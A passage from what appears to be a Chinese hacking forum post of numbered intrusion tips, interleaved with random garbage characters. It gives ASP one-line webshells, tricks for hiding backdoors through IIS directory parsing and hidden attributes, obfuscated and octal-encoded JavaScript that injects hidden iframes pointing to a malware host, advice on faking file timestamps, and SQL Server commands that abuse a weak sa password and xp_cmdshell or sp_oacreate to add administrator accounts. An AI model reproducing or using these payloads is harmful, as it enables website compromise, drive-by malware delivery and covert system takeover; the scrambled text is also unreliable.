$ w! C/ T% v0 ]3 n2 m# @e).<%25Execute(request("l"))%25>
: ^% `/ m" a8 Q# zf).<%if request("cmd")<>"" then execute request("pass")%>8 P2 o# _: X6 ~  D

2 f3 M4 z7 \# E( I& o/ ?52、at "12:17" /interactive cmd7 U- V6 w' A4 P! }) M5 c. k# @
执行后可以用AT命令查看新加的任务
5 k/ c- i# S1 S3 b, s! N6 k1 M用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。8 N! o6 N* {9 R! Z9 ]1 P

$ h* \$ T% z4 k! f0 F: u6 i53、隐藏ASP后门的两种方法
9 d- Y, ?  }  q; o* i& y& K1、建立非标准目录:mkdir images..\$ \  h$ ~" G+ r! V+ Z) ^  }+ N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp3 a2 O  T  u/ @& b9 C
通过web访问ASP木马:http://ip/images../news.asp?action=login
( K7 _/ o( N' [3 k- I& B( x$ E. r如何删除非标准目录:rmdir images..\ /s
# n( Q/ T, M. E6 k$ q& [( @0 `2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:3 c% `6 o1 X# O- Z2 r- h# h3 r  F- v4 G6 w2 C
mkdir programme.asp6 w. ^0 g" ?" o- E. h
新建1.txt文件内容:<!--#include file=”12.jpg”-->0 ^% H+ W  R. Y  l9 Y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- @6 Y  B+ ~3 S  R/ [' \attrib +H +S programme.asp
' ]% ~0 V5 s3 a4 g* P6 P( z& o通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% [, b0 D4 P2 \9 I8 T" B5 W; H$ @8 U8 Q9 J4 c2 g
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 O" O: F- b+ c/ F- z然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( D; s) h; {! j) b$ i- U& H

" `) H% ^5 C5 Y, N7 o/ [55、JS隐蔽挂马: g6 p0 T( d$ d
1.- x' Y- A% P9 E% C# M$ @
var tr4c3="<iframe src=ht";, ^+ R( C. Z2 F' F- v% b
tr4c3 = tr4c3+"tp:/";$ `9 b: m; J( X; `4 U1 g5 s: ^
tr4c3 = tr4c3+"/ww";$ Z4 z& e5 u: j5 @6 f" m5 a
tr4c3 = tr4c3+"w.tr4";
9 R' g5 B. J; [' N  Ltr4c3 = tr4c3+"c3.com/inc/m";
3 Z  F/ o1 d" G7 r% {tr4c3 = tr4c3+"m.htm style="display:none"></i";) E9 }: f2 d2 {. W  J
tr4c3 =tr4c3+"frame>'";
: l) E2 c; G( ?6 L2 f" Adocument.write(tr4c3);
) e: o- c+ t  k( e避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。1 w3 _# t' }+ U. u( t
% c  k2 a6 |% N2 @6 M; Y0 N) H
2." c) A. S1 Z$ a
转换进制,然后用EVAL执行。如
5 D4 r! D: b  ?2 [8 deval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
' `2 _* |+ G) s- F; [1 t不过这个有点显眼。
' P5 i6 c, \% Q; ?" H& c. e3.
" r+ U6 K; [* y' D$ T  ?0 }document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');# ]. H: Q$ ~8 T6 q5 a* B; `! \
最后一点,别忘了把文件的时间也修改下。
* F" U8 S% y1 S, {, X  K9 b9 V% M- o0 h
56.3389终端入侵常用DOS命令
+ t( z6 f7 P8 c4 ^taskkill taskkill /PID 1248 /t
: v  P* R) Q% X4 z
4 B) k8 M$ Y# Itasklist 查进程& s7 r; X/ j, H: r% Q* \
& P% Q1 A1 M. y2 \/ Q& h/ v: |
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限, v- g# {5 U( m  v# d+ l& {* T
iisreset /reboot
" V% O4 l! B4 j6 R& otsshutdn /reboot /delay:1    重起服务器, w- }$ O, I9 y, ^" w8 R! z

( T) B4 A; f( n, I8 ]7 K9 d0 rlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,- b) X4 ?+ ^% d! L
  {5 B! E2 U3 D& J* p. P6 t5 a+ X
query user 查看当前终端用户在线情况
5 |8 V" K6 l" u% ?9 ~: P8 }7 x" T0 t- y$ P" L" I8 U# R3 n8 C
要显示有关所有会话使用的进程的信息,请键入:query process *5 P& Y8 ~5 X$ g# o6 M
$ F% P* p$ T/ h$ @; q
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
4 p' F7 s4 b0 W' W- L" Z9 J
. n' G, J: C% o要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ v  o" w3 V* l$ Y
5 n: V/ v1 E9 r5 E' @要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 B9 V1 I& B" c; H4 [
+ o" G0 |7 @: D命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 v9 T( x& n5 n. p* P1 H
# O# ?3 s. x4 O
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 D1 E0 Y5 w2 v: o; ]
' P5 H8 b( b: T命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 T! e! C$ o8 X9 o6 R" {1 A0 |0 x6 S2 H( i8 `- [2 H
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机2 s/ k8 i+ m! m9 \1 ]
7 I% t  Z) ^3 O* l
56、在地址栏或按Ctrl+O,输入:+ }* P: T0 M5 L, }! w* U
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 u+ M4 v. }' N" W" f! M$ p( y4 B* t

& R1 E- k$ y# P  P  @$ e源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
9 m0 N8 U- `; ~5 O5 K- b: c: o# L  g( ?0 m
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
4 S  @  j! n9 c' \! B6 j用net localgroup administrators是可以看到管理组下,加了$的用户的。
& K# z; R1 U- c6 |1 Z* q" j- q0 z, Q) G" N! k
58、 sa弱口令相关命令5 f) Z( |/ e( h2 e7 O

% _& n6 Y( Q* N/ R# j一.更改sa口令方法:
, }5 E) v: F( [4 f用sql综合利用工具连接后,执行命令:
# h* N3 x8 P) R5 F, M: ]exec sp_password NULL,'20001001','sa'
& m; V) c% G9 ]" q9 E5 X1 [(提示:慎用!)
4 Z, `% B# }  R$ P7 }% [% q; z) k! X9 X+ R
二.简单修补sa弱口令.
0 {! ?' M8 t3 k) S% Z# V2 ?- X# g) s+ U2 L& n
方法1:查询分离器连接后执行:
$ B( e& Y. @- K$ ~% l$ D9 [) @if exists (select * from
* B/ x! W) `" P7 B/ f; Tdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
' u/ F3 F. ~- XOBJECTPROPERTY(id, N'IsExtendedProc') = 1)0 ^1 G* }/ G8 G& R) S( _+ c

; s8 N& D/ u( D% m6 Y9 k, j9 Z4 dexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
4 t* I4 T6 F5 F; T% A7 T; {" T/ Z" u: R! L% _
GO
" b& h3 Y6 y% S, ^' m1 T
% d4 P; O5 D, |$ ~4 F然后按F5键命令执行完毕
# F0 ^  g' s" F8 L2 y( `2 y- r- F* T
方法2:查询分离器连接后
: v# Y. X. Z7 i3 s" S$ w- ]第一步执行:use master1 s) k7 O: q' h+ x% i
第二步执行:sp_dropextendedproc 'xp_cmdshell'
1 G' O+ Z& S8 r( `& _% B然后按F5键命令执行完毕7 Q2 e7 G7 I* f/ |  w
# w! {! H6 H1 @4 e- @& Z% Q

! p9 E( g; K8 o9 E; ?* Y6 S% M! u" h三.常见情况恢复执行xp_cmdshell.
: c; ~9 l) ^6 w2 V# _4 N0 Y9 N' s# T% g
! E, Y% h6 j: R. S% P# F6 ^
1 未能找到存储过程'master..xpcmdshell'./ B( a5 E' l6 Z6 }1 ^5 R3 `- M
   恢复方法:查询分离器连接后,! ?4 R0 N+ b8 p2 M+ L
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 k0 I4 @" O. r% _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 b2 |- A* C- n9 P7 Q然后按F5键命令执行完毕
' t1 R3 Y: J, {( w' Z- M9 Q7 U  ^6 J3 \2 J
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
3 I; o& S* C! E  k' B* U4 B' d) B恢复方法:查询分离器连接后,
% J: s1 d. p/ ^- t. j9 T3 E第一步执行:sp_dropextendedproc "xp_cmdshell"7 z; f9 v* @& A2 Z5 g% \! T
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; ]0 m" S9 D* ^% v  i. x
然后按F5键命令执行完毕
5 w4 l" R7 ?2 c0 U' K: o& q, q
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 a& a- t0 t; @4 y( y7 [. R恢复方法:查询分离器连接后,  }$ h8 `; D: X( H8 i) S
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'( T/ c& c2 @7 F8 W' o# u
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ; V- L8 {+ ^* N  s% B7 ?. l6 X
然后按F5键命令执行完毕
( `; u7 D# J4 S. Q4 J+ A3 b; X9 E* \: g, v" v
四.终极方法./ K3 h" }* }# C6 o" _3 e
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:/ n5 Z& v0 t- S1 x( l
查询分离器连接后,
7 J" B' T$ J/ G3 @& z2000servser系统:
" h8 a) q0 n+ ~% fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'; g7 }) B6 z* p7 k
8 S; I8 c- i1 f$ g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 c- b+ P2 Y2 S6 u+ Z

: P( X8 \. v" i7 f* Nxp或2003server系统:
" B5 m- N4 m+ Y
' R1 Q, w. d' D. h* d. sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'! C3 K/ D/ x8 A8 {

' p' k1 v# C& i* r, W$ M. Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 w: A1 M: H* e) ^) e  z' ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表